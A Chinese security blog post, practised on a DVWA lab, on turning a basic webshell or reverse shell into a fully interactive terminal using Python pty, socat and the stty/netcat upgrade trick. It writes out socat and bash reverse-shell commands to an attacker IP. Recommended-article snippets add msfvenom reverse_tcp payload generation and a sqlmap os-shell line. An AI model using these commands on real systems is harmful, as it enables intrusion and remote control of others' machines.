获取完美shell

最新推荐文章于 2024-05-05 00:15:27 发布
最新推荐文章于 2024-05-05 00:15:27 发布
阅读量652 收藏 3
点赞数 1
分类专栏: 渗透 文章标签: 渗透测试 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010277543/article/details/125089789
版权

Snipaste_2022-05-31_15-55-49微信公众号:小惜渗透,欢迎大佬一起交流进步

获取完美shell

我们正常在使用webshell或反弹的shell的时候,多多少少会遇到如下问题:

  1. 一些命令受限
  2. 非交互式
  3. ctrl+c会直接断开连接
  4. 无命令补全
  5. 会出现乱码情况

这些问题导致我们执行命令的时候很不方便,而且会导致一些如提权类的操作失败,所以我们需要一个完美的终端(TTY)

下面我将边演示边来介绍几种提升shell的方法,我这里面用的Linux虚拟机搭的DVWA靶场上传文件(吐槽一下,在windows上用小皮面板搭建一点问题没有,在Linux上可能因为权限的问题,文件上传那块正常的图片就死活传不上去,后来自己一顿调,本来都想放弃了,结果瞎调调好了)

1.1 反弹shell

首先我这里用哥斯拉打开命令界面

image-20220526195813130

这时候可以通过方向上键回历史记录,但是一些需要交互的命令,如su或者vim都会执行失败,那么我们首先想到的肯定是反弹shell(反弹shell的命令大全,我公众号之前发过篇文章)

image-20220526200116465

如下图,通过bash tcp的方式弹了一个很正经的shell

image-20220526200815665

但是这时候,上键历史命令用不了了,不过一些交互有了点效果,如su和vim,但是我进到vim按ctrl+c会直接断开连接

image-20220526201218045

但有的时候,我们可能因为权限等问题不能用su,而su对我们来讲又是非常重要的,所以接下来我们可以对其进行一个升级

1.2 python pty 方式

这种方式有个前提是对方机器上必须有python,我这里通过rpm查询对方主机是否存在python

image-20220526202304234

既然存在那就在最基础的反弹shell后,执行下边的命令

#pty是python中的一个虚拟终端库
#spawn函数:创建一个进程并将其控制终端与当前进程的标准io连接
python -c 'import pty; pty.spawn("/bin/bash")'

然后通常情况下如果原本不能执行su的话,现在就可以执行了,不过这种方式几乎还是没啥提升,所以我们继续

1.3 socat

socat像netcat一样,我们可以用socat建立完整的TTY,但弊端就是需要在对方的主机上建立socat,说人话就是你得在对方机器安装或下载点东西,当然攻击机也需要安装

  • kali
#安装(因为我用的kali,所以就不用安了,它自带的)
sudo apt install socat
#监听端口
socat file:`tty`,raw,echo=0 tcp-listen:4444
  • 目标主机
#从github上下载脚本(省的安装了)到/tmp目录下
#当然可能碰到无法访问github的情况,那就本机下载然后传上去
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat

#给权限
chmod 755 /tmp/socat

#反弹
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.113:4444

可以看到连vim都可执行了,而且按ctrl+c不会直接断开了,但实际上还是不算非常完美,偶尔也会出现卡死的情况

image-20220527122019727

要注意这里断开连接,就不能采用ctrl+c了,而是需要exit

image-20220527122216362

1.4 花式操作–升级netcat

  • 攻击机
# 检查当前终端和STTY信息
echo $TERM
stty -a

结果如下

image-20220527140414326

  • 接收shell
#在接收到shell并启动下方的python交互式命令后
python -c 'import pty; pty.spawn("/bin/bash")'

#挂到后台
ctrl + z

#查看下后台是否存在
jobs -l

成功挂到后台

image-20220527125548804

然后重置stty

stty raw -echo

重置后长这样

image-20220527134700013

然后输入fg,将后台的任务还原,然后reset刷新终端屏幕,如图我这里出了点问题,当我输入回车的时候变成了^M又是一些奇怪的编码问题

#将后台挂起的任务还原到前台
fg

执行出错

于是我弹shell到阿里云上,然后重复上面的步骤,当我执行到重置stty的时候,它会像卡了一样,但其实不是它卡了,而是我们重置的原因我们看不到输入的内容,但是实际上还是在输入(这就像你输入密码的时候一样),输入fg回车

image-20220527143449184

紧接着执行刷新一下屏幕,看着更和谐

reset

它会询问你终端类型,根据第一步的信息来输入

image-20220527143620481

回车之后

image-20220527143631433

然后其实到这里几乎就可以了,但是还存在一个问题,就是显示问题了

接下来设置环境变量

export SHELL=bash
#根据最开始查出来的环境变量来设置
export TERM=xterm
stty rows 行数 columns 列数

ok,一个完美的shell就来了

1.5 上线到CS

正常CS是不能上线Linux主机的,但是通过CrossC2插件可以(这货坑太多了,浪费我好久时间),这里具体操作我就不多说了,看我另一篇文章

梦小惜
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
暴力破解到getshell
06-10
暴力破解到getshell视频教程,本课程通过暴力破解获取后台管理权限,通过上传一句话木马,获取服务器权限。通过案例操作详细讲解该种类型漏洞利用过程中所需要得知识,并针对研发讲解了该漏洞得修复方案,从攻击和防守两个方面完美展示该漏洞。
Shell脚本参数获取的两种方式
m0_46168848的博客
07-05 9084
Shell脚本参数获取的两种方式
获得shell的几种姿势
weixin_30566149的博客
07-13 363
windows提权 1.通过sqlmap连接mysql获取shell (1)直接连接数据库 sqlmap.py -d “mysql://root:[email protected]:3306/mysql”–os-shell (2)通过选择32位或者64位操作系统,获取webshell,执行 bash -i >& /dev/tcp/192.168.1.3/80800>&...
shell 例程 —— 解决redis读取稳定性
Rachel Zhang的专栏
07-22 1万+
问题背景: php读取线上redis数据,经常不稳定,数据响应时有时无。 解决方法:多次读取,每次读取所有上一次没读出的数据,直到全部获取。 本文实现用shell进行多次redis数据读取, 每次取出其中的有效值(对于我们的例子中,就是给key,能在redis上取得其value的为有效值,其他无效),并将无效值重跑一遍,以此迭代,直到所有redis数据被取出。PS:redis数据可以由php或
获取Shell后的操作
墨鱼菜鸡
06-21 796
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。 Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢? 第一步,先whoami 查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得...
获取shell执行结果,不创建实际文件
孤独小剑的专栏
09-06 1148
popen使用FIFO管道执行外部程序。 #include FILE *popen(const char *command, const char *type); int pclose(FILE *stream); popen 通过type是r还是w确定comm
如何在找到mssql注入获取shell
trouble2662714198的博客
06-20 2097
我在渗透过程中经常会遇到这种情况,我找到了一处注入,是基于时间的盲注,mssql有着强大功能其中之一就是执行任意系统命令。 但是,问题在于时间盲注,返回值很慢,简直到了让人抓狂的地步,因此,我总结一下我常用的方法,来获得一个优质的shell 1、开启3389,添加administrators组用户。 但是会经常遇到一些问题,比如3389打不开,可能是有防火墙,可以重置防火钱,可能是有其他防护...
如何在Linux中获取Shell类型和版本?
cunjiu9486的博客
10-12 430
While using remote sessions we may need to know the type and version of the remote shell. Bash is popular but there may be different shells like sh, csh, ksh etc. 在使用远程会话时,我们可能需要了解远程Shell的类型和版本。 Bash很...
exec_shell.patch
05-14
1. 博客:PostgreSQL的学习心得和知识总结(八十)|内核级自上而下完美实现PostgreSQL数据库 新增内置函数执行Shell命令并获取执行结果 的实现方案 2. 数据库内核开发 3.内置函数 4.执行shell脚本
pmss:pmss (Poor Man's Screenshooter) 是一个简单的屏幕截图脚本
05-30
拍摄完完美的屏幕截图后, pmss可以选择将屏幕截图匿名上传到imgur或imgur帐户,并为您提供GitHub,Reddit,论坛,留言板,网站,博客的图像共享链接。 当然pmss也会给你直接的图片链接和删除上传图片的链接。 更...
dotfiles:我的点文件-没什么特别的
03-05
make update学分由于使用了非常棒的MIT许可证,我从Joe Ferris的项目中获取了install.sh并对其进行了修改,以使我可以跳过一个简单的文件列表。 它远非完美,但也具有功能,并且足够好。 特别是,
FinalBuilder Server 7.0.0.317 crack,完美破解
12-18
完美破解 自动化持续集成,自动化部署,自动化单元测试,自动获取源代码 官方下载FinalBuilder Server 7.0.0.317 安装,然后用我的文件夹进行覆盖安装的FinalBuilder Server 7目录,然后找到网站,把所有网站用到的...
怎样拿shell的技巧
热门推荐
elsery
02-19 1万+
怎样拿shell的技巧结合本人和网络上的一些资料,仅供参考!经典的用户名密码 ‘or’=’or’ ‘or’1’=’1这2个密码在很多网站后台,QQ空间相册都可以登陆,不过不是100%而已….inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范
获取shell自身路径
bewinged
05-12 1969
获取shell执行时,当前的路劲,不管是./dirname还是/aa/bb/dirname DIR=$(cd "$(dirname "$0")";pwd)
Linux获得shell的方法大全
weixin_45441727的博客
03-15 1303
上传webshell 生成webshell msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw > /root/Desktop/shell.php 使用burpsuite将shell.php上传(上面jpg改格式的都会吧) 反弹shell1 制作监听脚本PHP msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw 然后
(转)Web安全之如何获取一个WebShell
selecthch的博客
06-22 3723
SQL注入获取Webshell** ** 条件: 1.当前连接Mysql数据库的账户 具有FIle权限 2. 知道网站的绝对路径 利用php报错信息 Google搜索报错信息 load_file()读取配置文件信息 3. MySQL有权...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8207
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全之密码学技术
缘友一世的博客
04-29 1447
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。
Web安全研究(八)
最新发布
至臻求学,胸怀云月
05-05 859
S&P 2021石溪大学攻击者依赖于恶意的bot发现易受攻击的网站,并入侵服务器泄漏用户数据。因此了解恶意的bot相当重要。作者设计了Aristaeus,用于部署大量蜜罐网站的系统,专门吸引和记录僵尸流量而存在的网站。每月都收到超过37k的请求数据,且超过一般都是请求试图暴力破解凭证,进行指纹识别,以及利用大量不同的漏洞。比较tls与ua头发现86.2%的bot都声称自己是chrome和firefox,但其实基于简单的http和命令行工具。
shell 获取路径
12-21
shell获取路径有多种方法,以下是两种常用的方法: 1. 使用dirname命令获取当前脚本的父目录路径: ```shell #!/bin/bash current_dir=$(dirname "$0") echo "当前脚本的父目录路径是:$current_dir" ``` 这段...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值